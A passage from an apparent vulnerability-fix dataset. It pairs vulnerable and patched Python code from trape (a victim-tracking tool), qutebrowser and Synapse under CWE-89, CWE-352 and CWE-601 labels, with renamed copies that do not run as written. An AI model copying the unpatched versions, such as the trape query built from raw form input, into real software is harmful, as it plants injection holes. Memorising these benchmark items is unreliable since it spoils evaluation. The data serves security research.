554,
560,
561,
566,
567,
572,
573,
578,
579,
583,
584,
588,
589,
593,
594,
599,
604,
606,
581,
596,
597,
598,
195,
196,
197,
239,
274,
405,
406,
407,
430,
431,
432,
490,
491,
492,
493,
494,
540
] |
2CWE-89
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends of this file
# For full copyright information this visit: https://github.com/boxug/trape
#
# Copyright 2017 by boxug / <hey@boxug.com>
#**
import urllib2
from flask import Flask, render_template, session, request, json
from core.trape import Trape
from core.db import Database
# Main parts, to generate relationships among others
trape = Trape()
app = Flask(__name__, template_folder='../templates', static_folder='../static')
# call database
db = Database()
# preview header tool in console
trape.header()
@app.route("/" + trape.stats_path)
def index():
return render_template("/login.html")
@app.route("/logout")
def logout():
return render_template("/login.html")
@app.route("/login", methods=["POST"])
def login():
id = request.form['id']
if id == trape.stats_key:
return json.dumps({'status':'OK', 'path' : trape.home_path, 'victim_path' : trape.victim_path, 'url_to_clone' : trape.url_to_clone, 'app_port' : trape.app_port, 'date_start' : trape.date_start, 'user_ip' : '127.0.0.1'});
else:
return json.dumps({'status':'NOPE', 'path' : '/'});
@app.route("/get_data", methods=["POST"])
def home_get_dat():
d = db.sentences_stats('get_data')
n = db.sentences_stats('all_networks')
('clean_online')
rows = db.sentences_stats('get_clicks')
c = rows[0][0]
rows = db.sentences_stats('get_sessions')
s = rows[0][0]
rows = db.sentences_stats('get_online')
o = rows[0][0]
return json.dumps({'status' : 'OK', 'd' : d, 'n' : n, 'c' : c, 's' : s, 'o' : o});
@app.route("/get_preview", methods=["POST"])
def home_get_preview():
vId = request.form['vId']
d = db.sentences_stats('get_preview', vId)
n = db.sentences_stats('id_networks', vId)
return json.dumps({'status' : 'OK', 'vId' : vId, 'd' : d, 'n' : n});
@app.route("/get_title", methods=["POST"])
def home_get_title():
opener = urllib2.build_opener()
html = opener.open(trape.url_to_clone).read()
html = html[html.find('<title>') + 7 : html.find('</title>')]
return json.dumps({'status' : 'OK', 'title' : html});
@app.route("/get_requests", methods=["POST"])
def home_get_requests():
d = db.sentences_stats('get_requests')
return json.dumps({'status' : 'OK', 'd' : d}); | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends of this file
# For full copyright information this visit: https://github.com/boxug/trape
#
# Copyright 2017 by boxug / <hey@boxug.com>
#**
import urllib2
from flask import Flask, render_template, session, request, json
from core.trape import Trape
from core.db import Database
# Main parts, to generate relationships among others
trape = Trape()
app = Flask(__name__, template_folder='../templates', static_folder='../static')
# call database
db = Database()
# preview header tool in console
trape.header()
@app.route("/" + trape.stats_path)
def index():
return render_template("/login.html")
@app.route("/logout")
def logout():
return render_template("/login.html")
@app.route("/login", methods=["POST"])
def login():
id = request.form['id']
if id == trape.stats_key:
return json.dumps({'status':'OK', 'path' : trape.home_path, 'victim_path' : trape.victim_path, 'url_to_clone' : trape.url_to_clone, 'app_port' : trape.app_port, 'date_start' : trape.date_start, 'user_ip' : '127.0.0.1'});
else:
return json.dumps({'status':'NOPE', 'path' : '/'});
@app.route("/get_data", methods=["POST"])
def home_get_dat():
d = db.sentences_stats('get_data')
n = db.sentences_stats('all_networks')
rows = db.sentences_stats('get_clicks')
c = rows[0][0]
rows = db.sentences_stats('get_sessions')
s = rows[0][0]
vId = ('online', )
rows = db.sentences_stats('get_online', vId)
o = rows[0][0]
return json.dumps({'status' : 'OK', 'd' : d, 'n' : n, 'c' : c, 's' : s, 'o' : o});
@app.route("/get_preview", methods=["POST"])
def home_get_preview():
vId = request.form['vId']
t = (vId,)
d = db.sentences_stats('get_preview', t)
n = db.sentences_stats('id_networks', t)
return json.dumps({'status' : 'OK', 'vId' : vId, 'd' : d, 'n' : n});
@app.route("/get_title", methods=["POST"])
def home_get_title():
opener = urllib2.build_opener()
html = opener.open(trape.url_to_clone).read()
html = html[html.find('<title>') + 7 : html.find('</title>')]
return json.dumps({'status' : 'OK', 'title' : html});
@app.route("/get_requests", methods=["POST"])
def home_get_requests():
d = db.sentences_stats('get_requests')
return json.dumps({'status' : 'OK', 'd' : d}); | sql | {
"code": [
" ('clean_online')",
" rows = db.sentences_stats('get_online')",
" d = db.sentences_stats('get_preview', vId)",
" n = db.sentences_stats('id_networks', vId)"
],
"line_no": [
50,
55,
63,
64
]
} | {
"code": [
" vId = ('online', )",
" rows = db.sentences_stats('get_online', vId)",
" t = (vId,)",
" d = db.sentences_stats('get_preview', t)",
" n = db.sentences_stats('id_networks', t)"
],
"line_no": [
54,
55,
63,
64,
65
]
} |
import urllib2
from flask import Flask, render_template, session, request, json
from core.trape import Trape
from core.db import Database
VAR_0 = Trape()
VAR_1 = Flask(__name__, template_folder='../templates', static_folder='../static')
VAR_2 = Database()
VAR_0.header()
@VAR_1.route("/" + VAR_0.stats_path)
def FUNC_0():
return render_template("/FUNC_2.html")
@VAR_1.route("/logout")
def FUNC_1():
return render_template("/FUNC_2.html")
@VAR_1.route("/login", methods=["POST"])
def FUNC_2():
VAR_3 = request.form['id']
if VAR_3 == VAR_0.stats_key:
return json.dumps({'status':'OK', 'path' : VAR_0.home_path, 'victim_path' : VAR_0.victim_path, 'url_to_clone' : VAR_0.url_to_clone, 'app_port' : VAR_0.app_port, 'date_start' : VAR_0.date_start, 'user_ip' : '127.0.0.1'});
else:
return json.dumps({'status':'NOPE', 'path' : '/'});
@VAR_1.route("/get_data", methods=["POST"])
def FUNC_3():
VAR_4 = VAR_2.sentences_stats('get_data')
VAR_5 = VAR_2.sentences_stats('all_networks')
('clean_online')
VAR_6 = VAR_2.sentences_stats('get_clicks')
VAR_7 = VAR_6[0][0]
VAR_6 = VAR_2.sentences_stats('get_sessions')
VAR_8 = VAR_6[0][0]
VAR_6 = VAR_2.sentences_stats('get_online')
VAR_9 = VAR_6[0][0]
return json.dumps({'status' : 'OK', 'd' : VAR_4, 'n' : VAR_5, 'c' : VAR_7, 's' : VAR_8, 'o' : VAR_9});
@VAR_1.route("/get_preview", methods=["POST"])
def FUNC_4():
VAR_10 = request.form['vId']
VAR_4 = VAR_2.sentences_stats('get_preview', VAR_10)
VAR_5 = VAR_2.sentences_stats('id_networks', VAR_10)
return json.dumps({'status' : 'OK', 'vId' : VAR_10, 'd' : VAR_4, 'n' : VAR_5});
@VAR_1.route("/get_title", methods=["POST"])
def FUNC_5():
VAR_11 = urllib2.build_opener()
VAR_12 = VAR_11.open(VAR_0.url_to_clone).read()
VAR_12 = html[VAR_12.find('<title>') + 7 : VAR_12.find('</title>')]
return json.dumps({'status' : 'OK', 'title' : VAR_12});
@VAR_1.route("/get_requests", methods=["POST"])
def FUNC_6():
VAR_4 = VAR_2.sentences_stats('get_requests')
return json.dumps({'status' : 'OK', 'd' : VAR_4}); |
import urllib2
from flask import Flask, render_template, session, request, json
from core.trape import Trape
from core.db import Database
VAR_0 = Trape()
VAR_1 = Flask(__name__, template_folder='../templates', static_folder='../static')
VAR_2 = Database()
VAR_0.header()
@VAR_1.route("/" + VAR_0.stats_path)
def FUNC_0():
return render_template("/FUNC_2.html")
@VAR_1.route("/logout")
def FUNC_1():
return render_template("/FUNC_2.html")
@VAR_1.route("/login", methods=["POST"])
def FUNC_2():
VAR_3 = request.form['id']
if VAR_3 == VAR_0.stats_key:
return json.dumps({'status':'OK', 'path' : VAR_0.home_path, 'victim_path' : VAR_0.victim_path, 'url_to_clone' : VAR_0.url_to_clone, 'app_port' : VAR_0.app_port, 'date_start' : VAR_0.date_start, 'user_ip' : '127.0.0.1'});
else:
return json.dumps({'status':'NOPE', 'path' : '/'});
@VAR_1.route("/get_data", methods=["POST"])
def FUNC_3():
VAR_4 = VAR_2.sentences_stats('get_data')
VAR_5 = VAR_2.sentences_stats('all_networks')
VAR_6 = VAR_2.sentences_stats('get_clicks')
VAR_7 = VAR_6[0][0]
VAR_6 = VAR_2.sentences_stats('get_sessions')
VAR_8 = VAR_6[0][0]
VAR_9 = ('online', )
VAR_6 = VAR_2.sentences_stats('get_online', VAR_9)
VAR_10 = VAR_6[0][0]
return json.dumps({'status' : 'OK', 'd' : VAR_4, 'n' : VAR_5, 'c' : VAR_7, 's' : VAR_8, 'o' : VAR_10});
@VAR_1.route("/get_preview", methods=["POST"])
def FUNC_4():
VAR_9 = request.form['vId']
VAR_11 = (VAR_9,)
VAR_4 = VAR_2.sentences_stats('get_preview', VAR_11)
VAR_5 = VAR_2.sentences_stats('id_networks', VAR_11)
return json.dumps({'status' : 'OK', 'vId' : VAR_9, 'd' : VAR_4, 'n' : VAR_5});
@VAR_1.route("/get_title", methods=["POST"])
def FUNC_5():
VAR_12 = urllib2.build_opener()
VAR_13 = VAR_12.open(VAR_0.url_to_clone).read()
VAR_13 = html[VAR_13.find('<title>') + 7 : VAR_13.find('</title>')]
return json.dumps({'status' : 'OK', 'title' : VAR_13});
@VAR_1.route("/get_requests", methods=["POST"])
def FUNC_6():
VAR_4 = VAR_2.sentences_stats('get_requests')
return json.dumps({'status' : 'OK', 'd' : VAR_4}); | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
18,
19,
22,
23,
25,
26,
28,
32,
36,
44,
49,
57,
59,
66,
73,
77
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
18,
19,
22,
23,
25,
26,
28,
32,
36,
44,
49,
57,
59,
67,
74,
78
] |
3CWE-352
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
# Copyright 2015-2018 Antoni Boucher (antoyo) <bouanto@zoho.com>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
#
# pylint complains when using .render() on jinja templates, so we make it shut
# up for this whole module.
"""Handler functions for file:... pages."""
import os
from qutebrowser.browser.webkit.network import networkreply
from qutebrowser.utils import jinja
def get_file_list(basedir, all_files, filterfunc):
"""Get a list of files filtered by a filter function and sorted by name.
Args:
basedir: The parent directory of all files.
all_files: The list of files to filter and sort.
filterfunc: The filter function.
Return:
A list of dicts. Each dict contains the name and absname keys.
"""
items = []
for filename in all_files:
absname = os.path.join(basedir, filename)
if filterfunc(absname):
items.append({'name': filename, 'absname': absname})
return sorted(items, key=lambda v: v['name'].lower())
def is_root(directory):
"""Check if the directory is the root directory.
Args:
directory: The directory to check.
Return:
Whether the directory is a root directory or not.
"""
# If you're curious as why this works:
# dirname('/') = '/'
# dirname('/home') = '/'
# dirname('/home/') = '/home'
# dirname('/home/foo') = '/home'
# basically, for files (no trailing slash) it removes the file part, and
# for directories, it removes the trailing slash, so the only way for this
# to be equal is if the directory is the root directory.
return os.path.dirname(directory) == directory
def parent_dir(directory):
"""Return the parent directory for the given directory.
Args:
directory: The path to the directory.
Return:
The path to the parent directory.
"""
return os.path.normpath(os.path.join(directory, os.pardir))
def dirbrowser_html(path):
"""Get the directory browser web page.
Args:
path: The directory path.
Return:
The HTML of the web page.
"""
title = "Browse directory: {}".format(path)
if is_root(path):
parent = None
else:
parent = parent_dir(path)
try:
all_files = os.listdir(path)
except OSError as e:
html = jinja.render('error.html',
title="Error while reading directory",
url='file:///{}'.format(path), error=str(e))
return html.encode('UTF-8', errors='xmlcharrefreplace')
files = get_file_list(path, all_files, os.path.isfile)
directories = get_file_list(path, all_files, os.path.isdir)
html = jinja.render('dirbrowser.html', title=title, url=path,
parent=parent, files=files, directories=directories)
return html.encode('UTF-8', errors='xmlcharrefreplace')
def handler(request):
"""Handler for a file:// URL.
Args:
request: QNetworkRequest to answer to.
Return:
A QNetworkReply for directories, None for files.
"""
path = request.url().toLocalFile()
try:
if os.path.isdir(path):
data = dirbrowser_html(path)
return networkreply.FixedDataNetworkReply(
request, data, 'text/html')
return None
except UnicodeEncodeError:
return None
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
# Copyright 2015-2018 Antoni Boucher (antoyo) <bouanto@zoho.com>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
#
# pylint complains when using .render() on jinja templates, so we make it shut
# up for this whole module.
"""Handler functions for file:... pages."""
import os
from qutebrowser.browser.webkit.network import networkreply
from qutebrowser.utils import jinja
def get_file_list(basedir, all_files, filterfunc):
"""Get a list of files filtered by a filter function and sorted by name.
Args:
basedir: The parent directory of all files.
all_files: The list of files to filter and sort.
filterfunc: The filter function.
Return:
A list of dicts. Each dict contains the name and absname keys.
"""
items = []
for filename in all_files:
absname = os.path.join(basedir, filename)
if filterfunc(absname):
items.append({'name': filename, 'absname': absname})
return sorted(items, key=lambda v: v['name'].lower())
def is_root(directory):
"""Check if the directory is the root directory.
Args:
directory: The directory to check.
Return:
Whether the directory is a root directory or not.
"""
# If you're curious as why this works:
# dirname('/') = '/'
# dirname('/home') = '/'
# dirname('/home/') = '/home'
# dirname('/home/foo') = '/home'
# basically, for files (no trailing slash) it removes the file part, and
# for directories, it removes the trailing slash, so the only way for this
# to be equal is if the directory is the root directory.
return os.path.dirname(directory) == directory
def parent_dir(directory):
"""Return the parent directory for the given directory.
Args:
directory: The path to the directory.
Return:
The path to the parent directory.
"""
return os.path.normpath(os.path.join(directory, os.pardir))
def dirbrowser_html(path):
"""Get the directory browser web page.
Args:
path: The directory path.
Return:
The HTML of the web page.
"""
title = "Browse directory: {}".format(path)
if is_root(path):
parent = None
else:
parent = parent_dir(path)
try:
all_files = os.listdir(path)
except OSError as e:
html = jinja.render('error.html',
title="Error while reading directory",
url='file:///{}'.format(path), error=str(e))
return html.encode('UTF-8', errors='xmlcharrefreplace')
files = get_file_list(path, all_files, os.path.isfile)
directories = get_file_list(path, all_files, os.path.isdir)
html = jinja.render('dirbrowser.html', title=title, url=path,
parent=parent, files=files, directories=directories)
return html.encode('UTF-8', errors='xmlcharrefreplace')
def handler(request, _operation, _current_url):
"""Handler for a file:// URL.
Args:
request: QNetworkRequest to answer to.
_operation: The HTTP operation being done.
_current_url: The page we're on currently.
Return:
A QNetworkReply for directories, None for files.
"""
path = request.url().toLocalFile()
try:
if os.path.isdir(path):
data = dirbrowser_html(path)
return networkreply.FixedDataNetworkReply(
request, data, 'text/html')
return None
except UnicodeEncodeError:
return None
| xsrf | {
"code": [
"def handler(request):"
],
"line_no": [
114
]
} | {
"code": [
"def handler(request, _operation, _current_url):",
" _current_url: The page we're on currently."
],
"line_no": [
114,
120
]
} |
import os
from qutebrowser.browser.webkit.network import networkreply
from qutebrowser.utils import jinja
def FUNC_0(VAR_0, VAR_1, VAR_2):
VAR_6 = []
for filename in VAR_1:
VAR_11 = os.path.join(VAR_0, filename)
if VAR_2(VAR_11):
VAR_6.append({'name': filename, 'absname': VAR_11})
return sorted(VAR_6, key=lambda v: v['name'].lower())
def FUNC_1(VAR_3):
return os.path.dirname(VAR_3) == directory
def FUNC_2(VAR_3):
return os.path.normpath(os.path.join(VAR_3, os.pardir))
def FUNC_3(VAR_4):
VAR_7 = "Browse VAR_3: {}".format(VAR_4)
if FUNC_1(VAR_4):
VAR_12 = None
else:
VAR_12 = FUNC_2(VAR_4)
try:
VAR_1 = os.listdir(VAR_4)
except OSError as e:
VAR_10 = jinja.render('error.html',
VAR_7="Error while reading directory",
url='file:///{}'.format(VAR_4), error=str(e))
return VAR_10.encode('UTF-8', errors='xmlcharrefreplace')
VAR_8 = FUNC_0(VAR_4, VAR_1, os.path.isfile)
VAR_9 = FUNC_0(VAR_4, VAR_1, os.path.isdir)
VAR_10 = jinja.render('dirbrowser.html', VAR_7=title, url=VAR_4,
VAR_12=parent, VAR_8=files, VAR_9=directories)
return VAR_10.encode('UTF-8', errors='xmlcharrefreplace')
def FUNC_4(VAR_5):
VAR_4 = VAR_5.url().toLocalFile()
try:
if os.path.isdir(VAR_4):
VAR_13 = FUNC_3(VAR_4)
return networkreply.FixedDataNetworkReply(
VAR_5, VAR_13, 'text/html')
return None
except UnicodeEncodeError:
return None
|
import os
from qutebrowser.browser.webkit.network import networkreply
from qutebrowser.utils import jinja
def FUNC_0(VAR_0, VAR_1, VAR_2):
VAR_8 = []
for filename in VAR_1:
VAR_13 = os.path.join(VAR_0, filename)
if VAR_2(VAR_13):
VAR_8.append({'name': filename, 'absname': VAR_13})
return sorted(VAR_8, key=lambda v: v['name'].lower())
def FUNC_1(VAR_3):
return os.path.dirname(VAR_3) == directory
def FUNC_2(VAR_3):
return os.path.normpath(os.path.join(VAR_3, os.pardir))
def FUNC_3(VAR_4):
VAR_9 = "Browse VAR_3: {}".format(VAR_4)
if FUNC_1(VAR_4):
VAR_14 = None
else:
VAR_14 = FUNC_2(VAR_4)
try:
VAR_1 = os.listdir(VAR_4)
except OSError as e:
VAR_12 = jinja.render('error.html',
VAR_9="Error while reading directory",
url='file:///{}'.format(VAR_4), error=str(e))
return VAR_12.encode('UTF-8', errors='xmlcharrefreplace')
VAR_10 = FUNC_0(VAR_4, VAR_1, os.path.isfile)
VAR_11 = FUNC_0(VAR_4, VAR_1, os.path.isdir)
VAR_12 = jinja.render('dirbrowser.html', VAR_9=title, url=VAR_4,
VAR_14=parent, VAR_10=files, VAR_11=directories)
return VAR_12.encode('UTF-8', errors='xmlcharrefreplace')
def FUNC_4(VAR_5, VAR_6, VAR_7):
VAR_4 = VAR_5.url().toLocalFile()
try:
if os.path.isdir(VAR_4):
VAR_15 = FUNC_3(VAR_4)
return networkreply.FixedDataNetworkReply(
VAR_5, VAR_15, 'text/html')
return None
except UnicodeEncodeError:
return None
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
25,
27,
30,
31,
34,
39,
49,
50,
53,
56,
60,
61,
62,
63,
64,
65,
66,
67,
69,
70,
73,
76,
81,
82,
85,
88,
93,
98,
106,
112,
113,
116,
119,
132,
24,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
52,
53,
54,
55,
56,
57,
58,
59,
72,
73,
74,
75,
76,
77,
78,
79,
84,
85,
86,
87,
88,
89,
90,
91,
115,
116,
117,
118,
119,
120,
121,
122
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
25,
27,
30,
31,
34,
39,
49,
50,
53,
56,
60,
61,
62,
63,
64,
65,
66,
67,
69,
70,
73,
76,
81,
82,
85,
88,
93,
98,
106,
112,
113,
116,
121,
134,
24,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
52,
53,
54,
55,
56,
57,
58,
59,
72,
73,
74,
75,
76,
77,
78,
79,
84,
85,
86,
87,
88,
89,
90,
91,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mock import Mock
import synapse
import synapse.api.errors
from synapse.api.constants import EventTypes
from synapse.config.room_directory import RoomDirectoryConfig
from synapse.rest.client.v1 import directory, login, room
from synapse.types import RoomAlias, create_requester
from tests import unittest
from tests.test_utils import make_awaitable
class DirectoryTestCase(unittest.HomeserverTestCase):
""" Tests the directory service. """
def make_homeserver(self, reactor, clock):
self.mock_federation = Mock()
self.mock_registry = Mock()
self.query_handlers = {}
def register_query_handler(query_type, handler):
self.query_handlers[query_type] = handler
self.mock_registry.register_query_handler = register_query_handler
hs = self.setup_test_homeserver(
http_client=None,
resource_for_federation=Mock(),
federation_client=self.mock_federation,
federation_registry=self.mock_registry,
)
self.handler = hs.get_directory_handler()
self.store = hs.get_datastore()
self.my_room = RoomAlias.from_string("#my-room:test")
self.your_room = RoomAlias.from_string("#your-room:test")
self.remote_room = RoomAlias.from_string("#another:remote")
return hs
def test_get_local_association(self):
self.get_success(
self.store.create_room_alias_association(
self.my_room, "!8765qwer:test", ["test"]
)
)
result = self.get_success(self.handler.get_association(self.my_room))
self.assertEquals({"room_id": "!8765qwer:test", "servers": ["test"]}, result)
def test_get_remote_association(self):
self.mock_federation.make_query.return_value = make_awaitable(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}
)
result = self.get_success(self.handler.get_association(self.remote_room))
self.assertEquals(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}, result
)
self.mock_federation.make_query.assert_called_with(
destination="remote",
query_type="directory",
args={"room_alias": "#another:remote"},
retry_on_dns_fail=False,
ignore_backoff=True,
)
def test_incoming_fed_query(self):
self.get_success(
self.store.create_room_alias_association(
self.your_room, "!8765asdf:test", ["test"]
)
)
response = self.get_success(
self.handler.on_directory_query({"room_alias": "#your-room:test"})
)
self.assertEquals({"room_id": "!8765asdf:test", "servers": ["test"]}, response)
class TestCreateAlias(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.handler = hs.get_directory_handler()
# Create user
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
# Create a test room
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
# Create a test user.
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, user=self.test_user, tok=self.test_user_tok)
def test_create_alias_joined_room(self):
"""A user can create an alias for a room they're in."""
self.get_success(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, self.room_id,
)
)
def test_create_alias_other_room(self):
"""A user cannot create an alias for a room they're NOT in."""
other_room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.get_failure(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, other_room_id,
),
synapse.api.errors.SynapseError,
)
def test_create_alias_admin(self):
"""An admin can create an alias for a room they're NOT in."""
other_room_id = self.helper.create_room_as(
self.test_user, tok=self.test_user_tok
)
self.get_success(
self.handler.create_association(
create_requester(self.admin_user), self.room_alias, other_room_id,
)
)
class TestDeleteAlias(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.handler = hs.get_directory_handler()
self.state_handler = hs.get_state_handler()
# Create user
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
# Create a test room
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
# Create a test user.
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, user=self.test_user, tok=self.test_user_tok)
def _create_alias(self, user):
# Create a new alias to this room.
self.get_success(
self.store.create_room_alias_association(
self.room_alias, self.room_id, ["test"], user
)
)
def test_delete_alias_not_allowed(self):
"""A user that doesn't meet the expected guidelines cannot delete an alias."""
self._create_alias(self.admin_user)
self.get_failure(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
),
synapse.api.errors.AuthError,
)
def test_delete_alias_creator(self):
"""An alias creator can delete their own alias."""
# Create an alias from a different user.
self._create_alias(self.test_user)
# Delete the user's alias.
result = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, result)
# Confirm the alias is gone.
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def test_delete_alias_admin(self):
"""A server admin can delete an alias created by another user."""
# Create an alias from a different user.
self._create_alias(self.test_user)
# Delete the user's alias as the admin.
result = self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
self.assertEquals(self.room_id, result)
# Confirm the alias is gone.
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def test_delete_alias_sufficient_power(self):
"""A user with a sufficient power level should be able to delete an alias."""
self._create_alias(self.admin_user)
# Increase the user's power level.
self.helper.send_state(
self.room_id,
"m.room.power_levels",
{"users": {self.test_user: 100}},
tok=self.admin_user_tok,
)
# They can now delete the alias.
result = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, result)
# Confirm the alias is gone.
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
class CanonicalAliasTestCase(unittest.HomeserverTestCase):
"""Test modifications of the canonical alias when delete aliases.
"""
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.handler = hs.get_directory_handler()
self.state_handler = hs.get_state_handler()
# Create user
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
# Create a test room
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = self._add_alias(self.test_alias)
def _add_alias(self, alias: str) -> RoomAlias:
"""Add an alias to the test room."""
room_alias = RoomAlias.from_string(alias)
# Create a new alias to this room.
self.get_success(
self.store.create_room_alias_association(
room_alias, self.room_id, ["test"], self.admin_user
)
)
return room_alias
def _set_canonical_alias(self, content):
"""Configure the canonical alias state on the room."""
self.helper.send_state(
self.room_id, "m.room.canonical_alias", content, tok=self.admin_user_tok,
)
def _get_canonical_alias(self):
"""Get the canonical alias state of the room."""
return self.get_success(
self.state_handler.get_current_state(
self.room_id, EventTypes.CanonicalAlias, ""
)
)
def test_remove_alias(self):
"""Removing an alias that is the canonical alias should remove it there too."""
# Set this new alias as the canonical alias for this room
self._set_canonical_alias(
{"alias": self.test_alias, "alt_aliases": [self.test_alias]}
)
data = self._get_canonical_alias()
self.assertEqual(data["content"]["alias"], self.test_alias)
self.assertEqual(data["content"]["alt_aliases"], [self.test_alias])
# Finally, delete the alias.
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
data = self._get_canonical_alias()
self.assertNotIn("alias", data["content"])
self.assertNotIn("alt_aliases", data["content"])
def test_remove_other_alias(self):
"""Removing an alias listed as in alt_aliases should remove it there too."""
# Create a second alias.
other_test_alias = "#test2:test"
other_room_alias = self._add_alias(other_test_alias)
# Set the alias as the canonical alias for this room.
self._set_canonical_alias(
{
"alias": self.test_alias,
"alt_aliases": [self.test_alias, other_test_alias],
}
)
data = self._get_canonical_alias()
self.assertEqual(data["content"]["alias"], self.test_alias)
self.assertEqual(
data["content"]["alt_aliases"], [self.test_alias, other_test_alias]
)
# Delete the second alias.
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), other_room_alias
)
)
data = self._get_canonical_alias()
self.assertEqual(data["content"]["alias"], self.test_alias)
self.assertEqual(data["content"]["alt_aliases"], [self.test_alias])
class TestCreateAliasACL(unittest.HomeserverTestCase):
user_id = "@test:test"
servlets = [directory.register_servlets, room.register_servlets]
def prepare(self, reactor, clock, hs):
# We cheekily override the config to add custom alias creation rules
config = {}
config["alias_creation_rules"] = [
{"user_id": "*", "alias": "#unofficial_*", "action": "allow"}
]
config["room_list_publication_rules"] = []
rd_config = RoomDirectoryConfig()
rd_config.read_config(config)
self.hs.config.is_alias_creation_allowed = rd_config.is_alias_creation_allowed
return hs
def test_denied(self):
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT",
b"directory/room/%23test%3Atest",
('{"room_id":"%s"}' % (room_id,)).encode("ascii"),
)
self.assertEquals(403, channel.code, channel.result)
def test_allowed(self):
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT",
b"directory/room/%23unofficial_test%3Atest",
('{"room_id":"%s"}' % (room_id,)).encode("ascii"),
)
self.assertEquals(200, channel.code, channel.result)
class TestRoomListSearchDisabled(unittest.HomeserverTestCase):
user_id = "@test:test"
servlets = [directory.register_servlets, room.register_servlets]
def prepare(self, reactor, clock, hs):
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT", b"directory/list/room/%s" % (room_id.encode("ascii"),), b"{}"
)
self.assertEquals(200, channel.code, channel.result)
self.room_list_handler = hs.get_room_list_handler()
self.directory_handler = hs.get_directory_handler()
return hs
def test_disabling_room_list(self):
self.room_list_handler.enable_room_list_search = True
self.directory_handler.enable_room_list_search = True
# Room list is enabled so we should get some results
request, channel = self.make_request("GET", b"publicRooms")
self.assertEquals(200, channel.code, channel.result)
self.assertTrue(len(channel.json_body["chunk"]) > 0)
